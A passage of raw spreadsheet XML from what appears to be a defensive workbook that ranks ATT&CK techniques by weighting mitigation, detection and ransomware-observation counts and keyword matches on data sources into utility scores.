      </c>
      <c r="P395" s="51">
        <v>0</v>
      </c>
      <c r="Q395" s="51">
        <v>0</v>
      </c>
      <c r="R395" s="53" t="s">
        <v>1271</v>
      </c>
      <c r="S395" s="51">
        <v>2</v>
      </c>
      <c r="T395" s="51" t="s">
        <v>1531</v>
      </c>
      <c r="U395" s="51">
        <v>5</v>
      </c>
      <c r="V395" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="W395">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X395">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y395">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z395">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA395">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB395">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC395" s="29" t="s">
        <v>1532</v>
      </c>
      <c r="AD395" s="25" t="str" cm="1">
        <f t="array" ref="AD395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC395)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE395" s="25">
        <f>IF(AD395="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF395" s="25" t="str" cm="1">
        <f t="array" ref="AF395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC395)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG395" s="25">
        <f>IF(AF395="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH395" s="25" t="str" cm="1">
        <f t="array" ref="AH395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC395)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI395" s="25">
        <f>IF(AH395="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ395" s="25" t="str" cm="1">
        <f t="array" ref="AJ395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC395)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK395" s="25">
        <f>IF(AJ395="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL395" s="25" t="str" cm="1">
        <f t="array" ref="AL395">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC395)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM395" s="25">
        <f>IF(AL395="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN395" s="58">
        <v>0</v>
      </c>
      <c r="AO395" s="51">
        <v>0</v>
      </c>
      <c r="AP395" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2166666666666671E-2</v>
      </c>
      <c r="AQ395" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.3888888888888907E-2</v>
      </c>
      <c r="AR395" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.3888888888888907E-2</v>
      </c>
      <c r="AS395" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT395" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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96" spans="1:47" ht="32.1">
      <c r="A396" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2166666666666671E-2</v>
      </c>
      <c r="B396" s="25">
        <f>SUM(H396,M396,V396)*(1+SUM(AE396,AG396,AI396,AK396,AM396))</f>
        <v>0.22166666666666671</v>
      </c>
      <c r="C396" s="25" t="s">
        <v>1533</v>
      </c>
      <c r="D396" s="25" t="s">
        <v>370</v>
      </c>
      <c r="E396" s="25" t="s">
        <v>1534</v>
      </c>
      <c r="F396" s="51">
        <v>1</v>
      </c>
      <c r="G396" s="51">
        <v>1</v>
      </c>
      <c r="H396" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I396">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J396">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K396">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L396">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M396" s="25">
        <v>0</v>
      </c>
      <c r="N396" s="51">
        <v>0</v>
      </c>
      <c r="O396" s="51">
        <v>0</v>
      </c>
      <c r="P396" s="51">
        <v>0</v>
      </c>
      <c r="Q396" s="51">
        <v>0</v>
      </c>
      <c r="R396" s="52">
        <v>2.7</v>
      </c>
      <c r="S396" s="51">
        <v>1</v>
      </c>
      <c r="T396" s="52" t="s">
        <v>319</v>
      </c>
      <c r="U396" s="51">
        <v>6</v>
      </c>
      <c r="V396" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="W396">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X396">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y396">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z396">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA396">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB396">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC396" s="29" t="s">
        <v>1535</v>
      </c>
      <c r="AD396" s="25" t="str" cm="1">
        <f t="array" ref="AD396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC396)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE396" s="25">
        <f>IF(AD396="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF396" s="25" t="str" cm="1">
        <f t="array" ref="AF396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC396)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG396" s="25">
        <f>IF(AF396="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH396" s="25" t="str" cm="1">
        <f t="array" ref="AH396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC396)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI396" s="25">
        <f>IF(AH396="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ396" s="25" t="str" cm="1">
        <f t="array" ref="AJ396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC396)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK396" s="25">
        <f>IF(AJ396="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL396" s="25" t="str" cm="1">
        <f t="array" ref="AL396">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC396)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM396" s="25">
        <f>IF(AL396="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN396" s="60">
        <v>0</v>
      </c>
      <c r="AO396" s="51">
        <v>0</v>
      </c>
      <c r="AP396" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2166666666666671E-2</v>
      </c>
      <c r="AQ396" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.3888888888888907E-2</v>
      </c>
      <c r="AR396" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.3888888888888907E-2</v>
      </c>
      <c r="AS396" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT396" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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97" spans="1:47" ht="63.95">
      <c r="A397" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2166666666666671E-2</v>
      </c>
      <c r="B397" s="25">
        <f>SUM(H397,M397,V397)*(1+SUM(AE397,AG397,AI397,AK397,AM397))</f>
        <v>0.22166666666666671</v>
      </c>
      <c r="C397" s="25" t="s">
        <v>1536</v>
      </c>
      <c r="D397" s="25" t="s">
        <v>99</v>
      </c>
      <c r="E397" s="25" t="s">
        <v>1537</v>
      </c>
      <c r="F397" s="51">
        <v>1</v>
      </c>
      <c r="G397" s="51">
        <v>1</v>
      </c>
      <c r="H397" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I397">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J397">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K397">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L397">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M397" s="25">
        <v>0</v>
      </c>
      <c r="N397" s="51">
        <v>0</v>
      </c>
      <c r="O397" s="51">
        <v>0</v>
      </c>
      <c r="P397" s="51">
        <v>0</v>
      </c>
      <c r="Q397" s="51">
        <v>0</v>
      </c>
      <c r="R397" s="52" t="s">
        <v>423</v>
      </c>
      <c r="S397" s="51">
        <v>3</v>
      </c>
      <c r="T397" s="52" t="s">
        <v>1538</v>
      </c>
      <c r="U397" s="51">
        <v>4</v>
      </c>
      <c r="V397" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="W397">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X397">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y397">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z397">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA397">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB397">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC397" s="29" t="s">
        <v>1539</v>
      </c>
      <c r="AD397" s="25" t="str" cm="1">
        <f t="array" ref="AD397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC397)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE397" s="25">
        <f>IF(AD397="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF397" s="25" t="str" cm="1">
        <f t="array" ref="AF397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC397)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG397" s="25">
        <f>IF(AF397="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH397" s="25" t="str" cm="1">
        <f t="array" ref="AH397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC397)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI397" s="25">
        <f>IF(AH397="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ397" s="25" t="str" cm="1">
        <f t="array" ref="AJ397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC397)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK397" s="25">
        <f>IF(AJ397="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL397" s="25" t="str" cm="1">
        <f t="array" ref="AL397">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC397)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM397" s="25">
        <f>IF(AL397="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN397" s="52">
        <v>0</v>
      </c>
      <c r="AO397" s="51">
        <v>0</v>
      </c>
      <c r="AP397" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2166666666666671E-2</v>
      </c>
      <c r="AQ397" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.3888888888888907E-2</v>
      </c>
      <c r="AR397" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.3888888888888907E-2</v>
      </c>
      <c r="AS397" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT397" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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98" spans="1:47" ht="32.1">
      <c r="A398" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9966666666666667E-2</v>
      </c>
      <c r="B398" s="25">
        <f>SUM(H398,M398,V398)*(1+SUM(AE398,AG398,AI398,AK398,AM398))</f>
        <v>0.19966666666666669</v>
      </c>
      <c r="C398" s="25" t="s">
        <v>1540</v>
      </c>
      <c r="D398" s="25" t="s">
        <v>109</v>
      </c>
      <c r="E398" s="25" t="s">
        <v>1541</v>
      </c>
      <c r="F398" s="51">
        <v>1</v>
      </c>
      <c r="G398" s="51">
        <v>1</v>
      </c>
      <c r="H398" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I398">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J398">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K398">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L398">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M398" s="25">
        <v>0</v>
      </c>
      <c r="N398" s="51">
        <v>0</v>
      </c>
      <c r="O398" s="51">
        <v>0</v>
      </c>
      <c r="P398" s="51">
        <v>0</v>
      </c>
      <c r="Q398" s="51">
        <v>0</v>
      </c>
      <c r="R398" s="51"/>
      <c r="S398" s="51">
        <v>0</v>
      </c>
      <c r="T398" s="51" t="s">
        <v>1542</v>
      </c>
      <c r="U398" s="51">
        <v>7</v>
      </c>
      <c r="V398" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="W398">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X398">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y398">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z398">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA398">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB398">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC398" s="29" t="s">
        <v>117</v>
      </c>
      <c r="AD398" s="25" t="str" cm="1">
        <f t="array" ref="AD398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC398)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE398" s="25">
        <f>IF(AD398="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF398" s="25" t="str" cm="1">
        <f t="array" ref="AF398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC398)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG398" s="25">
        <f>IF(AF398="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH398" s="25" t="str" cm="1">
        <f t="array" ref="AH398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC398)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI398" s="25">
        <f>IF(AH398="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ398" s="25" t="str" cm="1">
        <f t="array" ref="AJ398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC398)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK398" s="25">
        <f>IF(AJ398="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL398" s="25" t="str" cm="1">
        <f t="array" ref="AL398">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC398)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM398" s="25">
        <f>IF(AL398="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN398" s="63"/>
      <c r="AO398" s="51"/>
      <c r="AP398" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9966666666666667E-2</v>
      </c>
      <c r="AQ398" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>6.6555555555555562E-2</v>
      </c>
      <c r="AR398" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>6.6555555555555562E-2</v>
      </c>
      <c r="AS398" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT398" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU39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399" spans="1:47">
      <c r="A399" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="B399" s="25">
        <f>SUM(H399,M399,V399)*(1+SUM(AE399,AG399,AI399,AK399,AM399))</f>
        <v>0.16666666666666669</v>
      </c>
      <c r="C399" s="25" t="s">
        <v>1543</v>
      </c>
      <c r="D399" s="25" t="s">
        <v>391</v>
      </c>
      <c r="E399" s="25" t="s">
        <v>1544</v>
      </c>
      <c r="F399" s="51">
        <v>1</v>
      </c>
      <c r="G399" s="51">
        <v>1</v>
      </c>
      <c r="H399" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I399">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J399">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K399">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L399">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M399" s="25">
        <v>0</v>
      </c>
      <c r="N399" s="51">
        <v>0</v>
      </c>
      <c r="O399" s="51">
        <v>2</v>
      </c>
      <c r="P399" s="51">
        <v>0</v>
      </c>
      <c r="Q399" s="51">
        <v>0</v>
      </c>
      <c r="R399" s="51"/>
      <c r="S399" s="51">
        <v>0</v>
      </c>
      <c r="T399" s="51" t="s">
        <v>1545</v>
      </c>
      <c r="U399" s="51">
        <v>6</v>
      </c>
      <c r="V399" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>6.6666666666666666E-2</v>
      </c>
      <c r="W399">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>6</v>
      </c>
      <c r="X399">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Y399">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.10909090909090909</v>
      </c>
      <c r="Z399">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA399">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB399">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC399" s="29"/>
      <c r="AD399" s="25" t="str" cm="1">
        <f t="array" ref="AD399">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC399)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE399" s="25">
        <f>IF(AD399="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF399" s="25" t="str" cm="1">
